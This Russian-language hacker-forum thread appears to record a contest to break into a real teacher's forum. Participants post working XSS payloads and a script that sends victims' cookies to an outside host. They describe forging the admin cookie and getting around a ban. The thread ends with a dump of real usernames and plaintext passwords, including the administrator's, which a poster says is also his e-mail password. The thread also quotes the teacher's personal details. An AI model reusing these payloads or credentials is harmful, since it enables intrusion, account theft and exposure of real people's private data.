Конкурс: поимей препода


Вчера с Егором за фигню угарали и нашли очень примитивный форум с очень примитивной защитой (хотя само понятие слова "защита" тут не употребимо) ...

В общем есть форум http://prepod.km.ru/forum/index.php

Вы там регистрируетесь, находите "уязвимость", авторизируетесь под админом и в админке выдираете из БД форума все логины и пароли зарегистрированных юзеров ...

Примичание: пароль к аккаунту администратора на форуме совпадает с паролем на e-mail ...

Кто первый с этим справится и отпишется тут, тот получит собственный статус на форуме :D

Конкурс детский, так что призы тоже детские ...

один вопрос от начинающего хацкера-надо в html копаться или использовать id?

На форуме есть xss в теге

[img]javascript:alert(document.cookie);

+ еще xss в поиске:

http://prepod.km.ru/forum/search.php?text_poisk=%3Cscript%3Ejavascript:alert ();%3C/script%3E

Тут куки даже на сниффер высылать не надо ...
К тому же можно было покопаться с http://prepod.km.ru/forum/forum_tems.php?t=1&cat='
Но тут все гораздо проще ...

не,тут я не силен

lol - ну и система аутентификации :)))))
2Shits тебе не советовал бы по форуму лазить, когда там админ сидит,
темболее называясь грозным именем Hacker(SHiTS)

да пофиг,лучше скажи как пассы узнать!
я че-то где-то когда-то смотрел,по моему padonak.ru или .net ломали через куку
а тут че делать?

Да млин элементарнее не может быть, вот только админ свалит Ж)

все вы такие...

Ну блин ... Тут они еще думают ...
madnet
Ты то хоть прошел конкурс ? )

Странноватые cookies
board_user_cook=belo4ka
board_user_id=9
а у админа как не странно
board_user_cook=prepod
board_user_id=1
Гы :)

ну ЭТО ПОНЯТНО!!!
а узнать пассы как?!?!?!

Скидывайте сюда пароль его ...
Я говорил в самом начале про них ...

ты мне или madnet'y?
расскажи как всё-таки пассы узнать???
я в скриптах не секу,больше взломом юзверей занимаюсь,поэтому напишите как вы форум крякнули?!

Я теперь Лукитин :)
prepod.km.ru/forum/view_all_topic.php?m_id=22&mid=22&t=1&cat=2

Учитель истории и права высшей категории, методист по истории ЮАО г. Москвы, лауреат премии Вильчанской и "Грант Москвы", Учитель года Москвы - 2004, автор нескольких пособий по истории России, статей и мультимедийных изданий. Увлечения: работа, театр, музыка, ИТ.

Гы-гы админ в панике смотрите пока не удалил:)

Злой какой забанил 2 proxy Ж)

Конкурс усложнился )
Когда препод зашел на свой форум и увидел, что у него зарегистрировались страшные хакеры с никами Hacker(SHiTS) (c паролем 123456)& belo4ka (с паролем belka), то препод страшно пересрался и забанил их с форума ! Теперь взломщикам надо обойти бан злостного преподавателя Центра Исторического Образования и поиметь его по самое нехочу =)

:)
Это дейсвительно сложно :)

Он убил мою белочку :(

Что за сцука ента белочка ?
Что она оставляет мне мессаги:

:)
Где можно скачать контрольные для 10
класса по математике
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Как найду ее - за кафедрой выебу! =)))

Звиняйте она больше не будет
Cry :-(

мда, Че Гевара не на шутку прикололся.
насчет бана -фиг с ним всё равно не буду даже париться,бабки на нет жалко

Следующий раз прежде подумай, а потом делай
Lol :)

а че думать?
тут и так всё ясно.

Что-то не вижу паролей от тебя :)

забей .......

Все юзеры разбанены!! Конкурс действительно легкий)))

'prepod', 'ctvetochek'
'Андрей Лукутин', 'ctvetochek'
'Юлия', '175427',
'Аня', 'z,kjrj',
'Adia', '232323',
'31337', '31337',
'egro', '123454321',
'SHiTS', '123456',
'belo4ka', 'belka',
'Hacker(SHiTS)', '123456',
'ne_belo4ka', 'belka',
'Синев', 'sex',
'Смирнов', 'spirt',
'Petrov', 'piter',
'Ass', 'ass', 'ass@ass.ass',
'Zed', 'zed',
'Slava', 'qqq',
'Привет от SHiTS', '123456',
'pepsicola', 'nenavijuavtoinspekto',
'Цой', 'musik',
'Admin', 'qwerty'

Гы )
Наконец-то злого препода поимели по самое нехочу )
Всех благодаою за участие ))

madnet

4ugak[NhT]

SHiTS (тебе за яростное стремление впендюрить преподу)

Пишите какие статусы вы хотите ...

Хочу статус смерти :) +

2madnet

только увидел конкурс и моментом прошел)

Ты молодец :)

Хочу статус смерти :) + Как писаться будет ? "Страшная Смерть" ? :D

Я думаю просто и скромно
СМЕРТЬ

big tnx
КРАСАВА
):-}

http://www.cast.uark.edu/~kkvamme/cool.gif

Pepsi,
Ты как раз просил меня поменять аватар, а то страшный,
надеюсь угодил тебе? Ж)

а можно тож че-нить?а?

я бы хотел такую подпись))
кулхацкер
штоб стимул был)))

Лучше HACKER(SHiTS) !!! :)
Как на prepode :)

ага типа
SHiTS,HACKER(SHiTS)
или дамм,ван дамм,клод ван дамм,жан клод ван дамм
гыгы
КУЛХАЦКЕР

Парни, подкиньте еще конкурсик, а то так весело время провели.

Madnet, я тебе вот что скажу... Аватар у тебя просто невъеб*нно ох*енный! Был ацтой.
Можешь гордиться им =) Ламеры будут 100% в жуткой зависти с чувством ох*евшей вины в промышленном маштабе!!!

мож мне тоже поменять?а?

ЗЫ как насчет статуса?

на web-hack.ru проходите конкурс, я за... его проходить, все в тупик уходит, там минимум знаний по хакерству надо)

да ладно тебе минимум,щас посмотрим....
новогодний штоли?
так-так...
ага...
мда...
задачка...
С Новым Годом-более ниче в голову не лезет...

КОНКУРС ПРОЙДЕН!!!

Админы сделайте еще какой-нить конкурс плиз))
оч. предыдущий понравился
или как на web-hack'e
глядишь я че-нить научусь дефейсить ломать итп

Ну тоже поменяй аватар вообщем то :) Нужен эфективный :) Что бы те кто смотрел - были просто в ах*е =)

зацени чувак!

АААААААААААААААА
так мне статус поменяли!!!!!!!
АААААА
ПАСИБАААААА!!!!

lol
:)

SHiTS

жди, скоро от Nht будет конкурс, может быть =)

ок,будем ждать))

теперь проходим конкурс журнала ][акер(декабрь2004)
www.padonak.ru
вот